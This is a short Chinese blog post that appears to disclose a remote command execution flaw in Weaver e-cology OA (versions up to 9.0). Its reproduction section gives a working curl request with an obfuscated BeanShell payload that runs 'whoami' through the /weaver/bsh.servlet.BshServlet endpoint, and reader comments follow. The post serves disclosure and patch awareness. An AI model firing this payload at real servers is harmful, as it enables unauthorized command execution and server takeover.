泛微OA系统多版本存在命令执行漏洞-POC

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试315,2582字数 0阅读0分0秒阅读模式
AI智能摘要
你是否想过,一个办公系统竟会成为黑客入侵的突破口?泛微OA多版本被曝存在高危命令执行漏洞,攻击者只需构造特定请求,便可远程获取服务器权限,后果不堪设想。本文详细揭示漏洞成因、影响范围及复现过程,带你直击安全防线的致命缺口,每一位系统管理员和技术人员都不可错过。
— AI 生成的文章内容摘要
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统weaver e-cology 8存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行

0x03影响范围
泛微 e-cology<=9.0

0x04漏洞复现
访问 http://url/weaver/bsh.servlet.BshServleth 输入 payload 如下:
泛微OA系统多版本存在命令执行漏洞-POC

漏洞路径:/weaver/bsh.servlet.BshServlet exec("whoami") curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev al%00("ex"%2b"ec(/"whoami/")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

http://www.oniont.cn/index.php/archives/224.html

 
OnionT@KillBoy
  • it2021
  • it2021.com
  • 代码执行
  • 命令执行漏洞
  • 泛微OA漏洞
  • 漏洞复现
  • 远程代码执行
评论  3  访客  3
    • 泡泡小甜心
      泡泡小甜心 0

      这漏洞听着挺可怕,内网没打补丁的要赶紧排查。

      • 活力的瀑布
        活力的瀑布 0

        curl那段payload看着就晦涩,能不能贴个解码后的示例?

        • Leo光
          Leo光 0

          感觉厂商更新太慢了,老版本还在用的公司风险好大。

        匿名

        发表评论

        匿名网友

        拖动滑块以完成验证